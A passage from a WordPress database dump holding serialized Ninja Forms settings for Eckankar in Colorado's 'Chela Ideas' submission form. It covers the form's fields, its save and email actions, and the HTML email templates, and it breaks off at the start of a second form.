left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_263\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:23:\"When Would This Happen?\";s:9:\"field_key\";s:11:\"textbox_263\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:91;}i:14;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:15;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:5:\"label\";s:24:\"Where Would This Happen?\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_264\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:24:\"Where Would This Happen?\";s:9:\"field_key\";s:11:\"textbox_264\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:92;}i:15;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:16;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:5:\"label\";s:52:\"What Is The Anticipated Cost To Implement This Idea?\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_265\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:52:\"What Is The Anticipated Cost To Implement This Idea?\";s:9:\"field_key\";s:11:\"textbox_265\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:93;}i:16;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:17;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:199:\"This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797774442\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"620\";}i:17;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:18;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_255\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_255\";}s:2:\"id\";i:95;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:34\";s:5:\"label\";s:9:\"Save Form\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:33;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:34\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_241}\";s:13:\"email_subject\";s:32:\"Eckankar in Colorado Chela Ideas\";s:13:\"email_message\";s:4744:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_239},</strong></p><br /><br />\r\n<p>Thanks for getting in touch!Â  You have created a new form submission on the Eckankar In Colorado website where you detailed a new idea to help grow ECK In Colorado.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_239}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_240}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_241}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_242}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_243}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #23507d\"><strong>Information Submitted:</strong></span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>Give Your Idea A Title :</strong> {field:textbox_256}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Enter The Details of Your Idea:</strong> {field:textarea_253}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Why Should It Be Done (what is the spiritual purpose?) :</strong> {field:textbox_257}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Who Will Do It (you or someone else?):</strong> {field:textbox_258}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>How Many People Will Be Required To Make This Happen?:</strong> {field:textbox_259}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>When Would This Happen?:</strong> {field:textbox_263}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Where Would This Happen?:</strong> {field:textbox_264}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>What Is The Anticipated Cost To Implement This Idea?:</strong> {field:textbox_265}<br /><br /><br />\r\n </span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">Your idea will be forwarded to the appropriate individual at Colorado Eckankar and you will be contacted soon. If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:34;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:34\";s:5:\"label\";s:15:\"Success Message\";s:16:\"subs_expire_time\";s:2:\"90\";s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"exception_fields\";a:0:{}s:18:\"fields-save-toggle\";s:8:\"save_all\";s:15:\"submitter_email\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:14:\"drawerDisabled\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:361:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:35;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:34\";s:5:\"label\";s:11:\"Admin Email\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:32:\"Eckankar in Colorado Chela Ideas\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:4930:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Eckankar in Colorado Chela Ideas </span>form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact for <em>Eckankar in Colorado Chela Ideas</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\n The following person has submitted an idea to help grow Eckankar In Colorado.</strong></p><br /><br />\r\n<p><strong>Here is the information that <span style=\"color: #666666\">{field:textbox_239} {field:lastname_240}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_239}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_240}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_241}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_242}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_243}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Give Your Idea A Title :</strong> {field:textbox_256}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Enter The Details of Your Idea:</strong> {field:textarea_253}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Why Should It Be Done (what is the spiritual purpose?) :</strong> {field:textbox_257}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Who Will Do It (you or someone else?):</strong> {field:textbox_258}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>How Many People Will Be Required To Make This Happen?:</strong> {field:textbox_259}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>When Would This Happen?:</strong> {field:textbox_263}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>Where Would This Happen?:</strong> {field:textbox_264}<br /><br /><br />\r\n </span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>What Is The Anticipated Cost To Implement This Idea?:</strong> {field:textbox_265}<br /><br /><br />\r\n </span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br /><br />\r\n <br /><br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:36;}}s:8:\"settings\";a:30:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:11:\"Chela Ideas\";s:10:\"created_at\";s:19:\"2019-07-15 14:05:10\";s:10:\"form_title\";s:11:\"Chela Ideas\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-02-26 20:46:42\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"1\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:18:{i:0;s:8:\"html_238\";i:1;s:11:\"textbox_239\";i:2;s:12:\"lastname_240\";i:3;s:9:\"email_241\";i:4;s:9:\"phone_242\";i:5;s:14:\"listselect_243\";i:6;s:6:\"hr_244\";i:7;s:8:\"html_245\";i:8;s:11:\"textbox_256\";i:9;s:12:\"textarea_253\";i:10;s:11:\"textbox_257\";i:11;s:11:\"textbox_258\";i:12;s:11:\"textbox_259\";i:13;s:11:\"textbox_263\";i:14;s:11:\"textbox_264\";i:15;s:11:\"textbox_265\";i:16;s:18:\"html_1663797774442\";i:17;s:10:\"submit_255\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(10,'a:7:{s:2:\"id\";i:10;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:13:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:200:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado RESA Organization Communications</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:200:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado RESA Organization 